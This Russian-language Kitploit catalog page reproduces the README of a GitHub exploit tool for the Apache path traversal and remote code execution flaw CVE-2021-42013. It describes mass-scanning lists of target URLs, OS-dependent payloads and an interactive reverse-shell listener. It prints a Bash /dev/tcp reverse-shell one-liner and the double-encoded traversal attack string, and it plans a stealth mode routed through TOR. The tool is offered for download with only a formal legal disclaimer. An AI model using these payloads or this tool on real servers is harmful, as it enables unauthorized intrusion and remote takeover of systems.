Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2021-42013-EXPLOIT — Продвинутый инструмент для сканирования, эксплуатации и удалённого взаимодействия, предназначенный для обнаружения и использования уязвимости Apache Path Traversal + RCE (CVE-2021-42013) на неправильно сконфигурированных серверах. | Kitploit
Инструменты/GitHubGitHub/makavellik/poc-cve-2021-42013-exploit
РазведкаСканеры уязвимостейГенерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеКомандование и Управление

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Инструмент Удаленного Доступа
GitHubmakavellik/poc-cve-2021-42013-exploit

POC-CVE-2021-42013-EXPLOIT

Продвинутый инструмент для сканирования, эксплуатации и удалённого взаимодействия, предназначенный для обнаружения и использования уязвимости Apache Path Traversal + RCE (CVE-2021-42013) на неправильно сконфигурированных серверах.

Репозиторий
41 год назадЕщё не проверено
Поделиться

Typing SVG

banner

Python License MIT Active Stealth Mode Simbiosis


root@kitploit:~
# 🔥 CVE-2021-42013 Exploit Framework от Makaveli

> 💀 Космический многомерный хакерский режим активирован...

Продвинутый инструмент сканирования, эксплуатации и удалённого взаимодействия, предназначенный для обнаружения и использования уязвимости **Apache Path Traversal + RCE (CVE-2021-42013)** на неправильно сконфигурированных серверах.

---

## ⚠️ Правовое предупреждение

> Данное программное обеспечение предоставляется исключительно в образовательных и исследовательских целях в контролируемых средах.

Использование этого инструмента против систем без явного разрешения может быть незаконным и является преступлением во многих странах.

Автор не несёт ответственности за ненадлежащее использование этого кода. Используйте его на свой страх и риск и только с явного разрешения владельца целевой системы.

---

 🧠 Техническое описание

Этот инструмент позволяет:

- ✅ Сканировать несколько целей из файла `.txt`.
- ✅ Автоматически обнаруживать наличие CVE-2021-42013.
- ✅ Определять удалённую операционную систему (Linux или Windows).
- ✅ Отправлять настраиваемые payload'ы в зависимости от обнаруженной системы.
- ✅ Устанавливать reverse shell и получать удалённый доступ.
- ✅ Взаимодействовать с оболочкой в реальном времени через встроенный listener.
- ✅ Пользоваться расширенными логами, индикатором прогресса и интерактивным меню.

---

## 🔧 Требования

- Python **3.8+**
- Системы на базе Unix/Linux/MacOS (использование `subprocess` и `curl`)
- Требуются следующие библиотеки Python:

```bash
pip install -r requirements.txt
```

**`requirements.txt`**

```
rich
alive-progress
```

Также на операционной системе должен быть установлен `curl`.

---

## 📁 Структура файлов

```
.
├── POC-CVE.py       # Script principal
├── logs.txt              # Archivo de logs generado automáticamente
├── requirements.txt      # Dependencias Python
└── targets.txt           # (Opcional) Lista de URLs a escanear
```

---

## 🚀 Интерактивное использование

```bash
python3 POC-CVE.py
```

Выберите один из режимов:

* `scan_file`: сканирует несколько URL из файла и показывает, какие из них уязвимы.
* `exploit`: прямая эксплуатация одной цели с reverse shell.
* `exit`: выход из интерактивного режима.

---

## 🔍 Массовое сканирование (scan\_file)

1. Создайте файл со списком URL, по одному в строке:

```txt
http://example.com
http://victim.net
http://192.168.1.100
```

2. Запустите сканирование:

```bash
python3 POC-CVE.py
```

Выберите `scan_file` и укажите:

* Путь к файлу
* Количество потоков (threads) для параллельного сканирования

---

## 💥 Эксплуатация (exploit)

1. Выберите `exploit` в меню.
2. Введите:

* URL цели
* Ваш локальный IP (`LHOST`) для приёма shell
* Свободный порт (`LPORT`) для listener

Скрипт:

* Определит, уязвима ли цель.
* Отправит подходящий payload в зависимости от удалённой операционной системы.
* Откроет **listener** и предоставит вам интерактивный доступ.

---

## 🧪 Примеры Payload'ов

### Linux Payload (Bash TCP Reverse Shell)

```bash
bash -c 'exec 124<>/dev/tcp/LHOST/LPORT;sh <&124 >&124 2>&124'
```

### Windows Payload (PowerShell TCP Reverse Shell)

```powershell
powershell -NoP -NonI -W Hidden -Command ...
```

---

## 🧠 Используемые техники

* Path traversal с двойным кодированием (`/.%252e/.%252e/.%252e`)
* Инъекция команд через `curl`
* Обходные заголовки (`User-Agent`, `Accept` и т. д.)
* Reverse shell для получения удалённого контроля
* Многопоточность и индикатор прогресса (Alive Progress)
* Логирование с временными метками и Rich Console

---

## 📌 Справка по CVE

* **CVE-ID**: [CVE-2021-42013](https://nvd.nist.gov/vuln/detail/CVE-2021-42013)
* **Вектор атаки**: `GET /cgi-bin/.%%32%65/.%%32%65/...`
* **Воздействие**: RCE (Remote Code Execution)
* **Оценка CVSS**: 9.8 (критическая)

---

## 🧙‍♂️ Автор

* ✨ **Makaveli** — *«Взломай свою собственную реальность»*

---

## 🛡️ Отказ от ответственности

> Этот проект предоставляется «как есть», без каких-либо гарантий и ответственности за ущерб, возникший в результате его использования.
> **Никогда не сканируйте и не эксплуатируйте систему без явного согласия её владельца.**

---

## ✅ Рекомендации

* Используйте этот скрипт только в **лабораторных средах** или при авторизованном тестировании.
* Убедитесь, что порт, заданный для listener, **открыт** и **не блокируется брандмауэром**.
* Запускайте от обычного пользователя (не root), если только это не строго необходимо.

---

## 🧩 Планы на будущее (необязательно)

* [ ] Поддержка пользовательских payload'ов
* [ ] Экспорт результатов в CSV/JSON
* [ ] Stealth-режим с ротацией заголовков и TOR-прокси
* [ ] Локальный веб-интерфейс (Flask)



@DonMakaveliw, ты готов создать будущее?


Скачать инструмент